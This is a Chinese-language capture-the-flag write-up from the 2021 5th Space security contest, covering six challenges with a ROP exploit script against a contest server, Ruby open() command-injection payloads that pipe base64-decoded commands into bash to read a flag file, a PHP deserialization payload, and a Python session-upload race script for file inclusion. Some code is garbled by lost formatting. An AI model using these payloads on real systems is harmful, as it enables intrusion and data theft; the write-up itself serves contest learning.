第五空間網絡安全大賽 WHT WRITEUP
VSole2021-09-18 10:37:15
一、 戰隊信息
戰隊名稱:WHT
戰隊排名:社企組 26
二、 解題過程
1 簽到
下載附件,并解壓后,發現 flag 文本,提交即可。
flag 值:flag{welcometo5space}
2 bountyhunter
EXP:
from pwn import *context(os='linux', arch='amd64', log_level='debug') content = 0
pop_rdi_ret_addr=0x000000000040120b system_addr=0x0000000000401030 sh_addr=0x0000000000403408
def main():try:if content == 1:upload = process("./pwn1")else:upload = remote("139.9.123.168", 32548)except:print("The exp is error~")
payload = ('a' * (0x90 + 0x8)).encode() payload += p64(pop_rdi_ret_addr) payload += p64(sh_addr)payload += p64(system_addr)
upload.recvuntil("Who are you? What do you want?") upload.sendline(payload)
upload.interactive() main()```
3 WebFTP
項目地址:`https://github.com/wifeat/WebFTP`
4 PNG 圖片轉換器
ruby 的源代碼
require 'sinatra' require 'digest' require 'base64'
get '/' doopen("./view/index.html", 'r').read() end
get '/upload' do open("./view/upload.html", 'r').read()end
post '/upload' dounless params[:file] && params[:file][:tempfile] && params[:file][:filename] &¶ms[:file][:filename].split('.')[-1] == 'png'return "alert('error');location.href='/upload';" endbeginfilename = Digest::MD5.hexdigest(Time.now.to_i.to_s + params[:file][:filename]) + '.png' open(filename, 'wb') { |f|f.write open(params[:file][:tempfile],'r').read()}"Upload success, file stored at #{filename}" rescue'something wrong' end
end
get '/convert' do open("./view/convert.html", 'r').read()end
post '/convert' do beginunless params['file']return "alert('error');location.href='/convert';" end
file = params['file']unless file.index('..') == nil && file.index('/') == nil && file =~ /^(.+)\.png$/ return "alert('dont hack me');"endres = open(file, 'r').read()headers 'Content-Type' => "text/html; charset=utf-8""var img = document.createElement(\"img\");img.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";"rescue'something wrong' endend
漏洞利用的關鍵點是這一行(參考:https://vulhub.org/#/environments/ruby/CVE-2017-17405/)
res = open(file, 'r').read()
這里使用了 open()函數來打開可控制 file 參數傳入的文件名。而 ruby 中的 open()函數是借用系統命令來打開文件,且沒用過濾 shell 字符,導致在用戶控制文件名的情況下,將可以注入任意命令。
源碼中會將 open()執行過后的結果 base64 編碼后返回,加上 file 參數處有些過濾和必須以.png 結尾的限制;即可構造
file=|whoami > test.png
如果返回 something wrong,可以嘗試多執行幾次。接下來繞過..、/即可,直接利用 base64 編碼繞過
file=|echo "bHMgLWxoYSAv"|base64 -d|bash > test.png
讀取/FLA9_zAIBhoJmWSX9RUcnPDrL
file=|echo "Y2F0IC9GTEE5X3pBSUJob0ptV1NYOVJVY25QRHJM"|base64 -d|bash > test.png
5 pklovecloud
include 'flag.php'; class pkshow{function echo_name(){return "Pk very safe^.^";}}
class acp{protected $cinder; public $neutron; public $nova; function construct(){$this->cinder = new pkshow;}function toString(){if (isset($this->cinder))return $this->cinder->echo_name();}}
class ace{public $filename; public $openstack; public $docker; function echo_name(){$this->openstack = unserialize($this->docker);$this->openstack->neutron = $heat;if($this->openstack->neutron === $this->openstack->nova){
簡單的反序列化,需要注意下的就是兩個對象相互嵌套時注意區分,不要陷入死循環
{protected $cinder; public $neutron; public $nova;function construct($i){if($i == 1){$this->cinder = new ace();}else{return $i;}}
}class ace{public $filename = '/flag.php'; public $openstack;public $docker; function construct(){$this->docker = serialize(new acp(0));}}
$res = new acp(1);echo urlencode(serialize($res));?>
O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7B
s%3A8%3A%22filename%22%3Bs%3A9%3A%22%2Fflag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3 A6%3A%22docker%22%3Bs%3A61%3A%22O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder% 22%3BN%3Bs%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D%22%3B%7Ds%3A7%3A%22n eutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D
6 EasyCleanup
if(!isset($_GET['mode'])){ highlight_file( file );}else if($_GET['mode'] == "eval"){$shell = $_GET['shell'] ?? 'phpinfo();';if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell);}
if(isset($_GET['file'])){if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker"); include $_GET['file'];}
function filter($var): bool{$banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*","`"];
foreach($banned as $ban){ if(strstr($var, $ban)) return True;}
return False;}
function checkNums($var): bool{$alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';$cnt = 0;for($i = 0; $i < strlen($alphanum); $i++){ for($j = 0; $j < strlen($var); $cnt += 1;if($cnt > 8) return True;}}}return False;}
?>
合并運算符(??)
$shell = $_GET['shell'] ?? 'phpinfo();'
如果有設置?shell,則?shell 的值為其設置的值;若沒有設置,則?shell=phpinfo(); 審計源碼,很明顯這里直接命令執行應該是無法執行的:
· 總長度不能大于等于 15
· 數字和字母的字符次數不能大于等于 8 次
加上一些 filter()的過濾,這里基本無法實現?shell 的代碼執行
關鍵在 include $_GET['file'];,有文件包含,雖然有 filter()和長度的限制,但是沒有最惡心的 CheckNums();加上給了我們一個 phpinfo。查看一下 session.upload_progress,默認都是開啟的。并且這里記錄上傳進度的 session 文件都沒有開啟自動清除
(session.upload_progress.cleanup==Off),條件競爭都不用做了。
沒有給出 session.save_path,那 sesion 應該就是默認保存位置:/tmp/sess_xxx 直接利用以前做 session upload progress 的腳本即可,稍微改一下就能直接打
# -*- coding: utf-8 -*- import ioimport requests import threading
myurl = 'http://114.115.134.72:32770/index.php' sessid = '7'myfile = io.BytesIO(b'mochu7' * 1024)writedata = {"PHP_SESSION_UPLOAD_PROGRESS": ""} mycookie = {'PHPSESSID': sessid}
def writeshell(session): while True:resp = requests.post(url=myurl, data=writedata, files={'file': ('mochu7.txt', myfile)}, cookies=mycookie)
def getshell(session): while True:payload_url = myurl + '?file=' + '/tmp/sess_' +sessid resp = requests.get(url=payload_url)if 'upload_progress' in resp.text: print(resp.text)breakelse:pass
if name == ' main ': session = requests.session()writeshell = threading.Thread(target=writeshell, args=(session,)) writeshell.daemon = Truewriteshell.start() getshell(session)
如果一個 sess_id 打了好幾次沒有刷新,建議換個 sess_id 打
VSole
網絡安全專家